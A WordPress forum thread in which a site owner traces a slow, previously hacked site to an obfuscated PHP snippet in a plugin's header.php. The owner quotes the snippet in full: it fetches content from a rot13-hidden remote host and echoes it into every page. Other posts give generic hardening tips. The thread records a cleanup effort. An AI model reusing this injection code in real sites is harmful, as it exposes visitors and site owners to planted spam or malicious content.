Hacked, Cleaned but something is still amiss

  • Enyalios

    (@enyalios)


    8 years, 4 months ago

    Our website was compromised earlier this year. We never really found what the security gap was but the goal seemed to be using our mailserver to send spam Emails. After using wordfence to clean things up and changing all passwords things got back to normal – almost. Our -rather simple- website takes about 26 seconds to load. According to popular website analyzers there is a solid 16 secs of wait before server starts sending data. We spoke with our hosting service and they said our website was trying to contact a specific IP address and that could be the cause of the delay.
    They quoted:

    connect(7, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr(“**.***.***.**”)}, 16) = -1 EINPROGRESS (Operation now in progress)

    The IP address seems to be somewhere in Russia and does not resolve to a specific website -although several dodgy ones have used it in the past.

    Since that, we reinstalled every plugin, installed Sucuri Security and run additional scans but problem still persists.

    Any advice on how to proceed? Website address: atmors.gr

Viewing 3 replies - 1 through 3 (of 3 total)
  • Ractors

    (@ractors)

    8 years, 4 months ago

    There is no issue with the main homepage.

    This is how you can find malicious code.

    Open cpanel (if you are using that) and navigate to file manager. Check each file modification date.

    Thread Starter Enyalios

    (@enyalios)

    8 years, 4 months ago

    Thanks for your reply. You didnt see it cause i managed to get it fixed!Here is how:

    My theme is using the cherry framework plugin. Apparently what was compromised was not in the theme folder but the cherry framework one. In the header.php i found this:

    <?php $url = str_rot13('uggc://scrq8.bet/flfgrz/yvaxbixn.cuc?qbabe=');if(!$SESSION['dsfdsfdsf']){if (function_exists('curl_version')){$handle = curl_init();curl_setopt($handle, CURLOPT_URL, $url . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"]);curl_setopt($handle, CURLOPT_RETURNTRANSFER, TRUE);$adasd = curl_exec($handle);$SESSION['dsfdsfdsf'] = $adasd;echo $adasd;curl_close($handle);} else{$SESSION['dsfdsfdsf'] = file_get_contents($url . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"]);echo $SESSION['dsfdsfdsf'];} }else{ echo $SESSION['dsfdsfdsf']; echo"<!--session--->";} ?>

    Checking the dates does not really help since we have had to do a lot of cleaning which changed the dates anyway. I checked the rest of the files in that folder and it seems they are ok.

    Now i am left wondering why the antivirus plugins didnt check there and the hack was left undetected and what else might have been compromised that I dont know about.

    Ractors

    (@ractors)

    8 years, 4 months ago

    Here is few quick things you can do

    1. W3 Total Cache: Db cache debug info: – Disable that
    2. You are using default sql table name wp_ – You can change
    3. Update wordpress to latest version if that is old

    Don’t forgot to take backup before doing anything.

    Read this : http://codex.wordpress.org/Hardening_WordPress

Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘Hacked, Cleaned but something is still amiss’ is closed to new replies.